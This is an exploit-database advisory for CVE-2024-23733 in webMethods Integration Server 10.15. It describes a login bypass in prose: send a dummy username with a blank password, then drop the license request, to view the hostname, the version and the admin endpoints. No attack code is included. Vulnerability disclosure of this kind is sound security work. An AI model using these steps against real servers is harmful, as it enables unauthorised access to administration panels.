WebMethods Integration Server 10.15.0.0000-0092 Improper Access on Login Page

2025.05.06

Credit: Rasime Ekici

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : 2024-23733

Description:

The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri

Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see:
-real hostname of the installed server
-version info
-administrative api endpoints

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebMethods Integration Server 10.15.0.0000-0092 Improper Access on Login Page

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.